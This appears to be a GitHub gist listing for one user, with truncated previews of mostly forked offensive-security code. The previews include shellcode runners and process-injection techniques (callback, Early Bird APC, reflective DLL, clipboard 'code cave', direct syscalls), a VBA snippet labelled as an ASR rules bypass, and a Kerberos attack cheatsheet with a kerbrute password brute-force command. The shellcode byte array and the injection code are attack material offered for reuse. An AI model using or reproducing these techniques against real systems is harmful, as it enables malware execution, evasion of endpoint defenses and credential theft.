PE Injection/Impersonation:
v4nyl
/ JasonToddIsTheBestRobin.c
Created
February 20, 2026 20:37
— forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
v4nyl
/ injection_demos.md
Created
December 29, 2025 21:36
— forked from hasherezade/injection_demos.md
List of my PE injection demos
v4nyl
/ ASR Rules Bypass.vba
Created
March 30, 2022 19:54
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
v4nyl
/ client-ipv6-generic.c
Created
February 1, 2022 19:22
— forked from mhaskar/client-ipv6-generic.c
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <inttypes.h> | |
| #include <winsock2.h> | |
| #include <windns.h> | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <tlhelp32.h> | |
v4nyl
/ ReflectedDll.c
Created
December 20, 2021 19:48
— forked from Cracked5pider/ReflectedDll.c
Get output from injected reflected dll
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //===============================================================================================// | |
| // This is a stub for the actuall functionality of the DLL. | |
| //===============================================================================================// | |
| #include "ReflectiveLoader.h" | |
| #include <stdio.h> | |
| // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are | |
| // defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own | |
| // DllMain and use the LoadRemoteLibraryR() API to inject this DLL. |
v4nyl
/ Win32_Callback_Inject.cs
Created
November 24, 2021 18:38
Win32 Callback Injection - 12 Methods
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| //Resource: https[:]//vx-underground.org/papers.html -> Windows VX -> INJECTION -> Win32 Callback Injection (Author(s): Dreamer && Clover) | |
| namespace Callback_Inject | |
| { | |
| class Program | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Using the clipboard as your code cave. | |
| // Generate your shellcode with msfvenom or whatever | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs | |
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace ClippySCInject | |
| { |
v4nyl
/ SysCall.cpp
Created
November 7, 2021 13:21
— forked from benpturner/SysCall.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <iostream> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| typedef struct _PS_ATTRIBUTE { | |
| ULONG Attribute; | |
| SIZE_T Size; | |
| union { |
v4nyl
/ Remove-File-Eventually.ps1
Created
October 17, 2021 19:29
— forked from marnix/Remove-File-Eventually.ps1
PowerShell command to delete a file, if possible immediately, and if it is in use at the next boot.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [parameter(Mandatory=$true)] | |
| [string] $path | |
| ) | |
| # the code below has been used from | |
| # https://blogs.technet.com/b/heyscriptingguy/archive/2013/10/19/weekend-scripter-use-powershell-and-pinvoke-to-remove-stubborn-files.aspx | |
| # with inspiration from | |
| # http://www.leeholmes.com/blog/2009/02/17/moving-and-deleting-really-locked-files-in-powershell/ | |
| # and error handling from |
v4nyl
/ kerberos_attacks_cheatsheet.md
Created
September 18, 2021 18:43
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
NewerOlder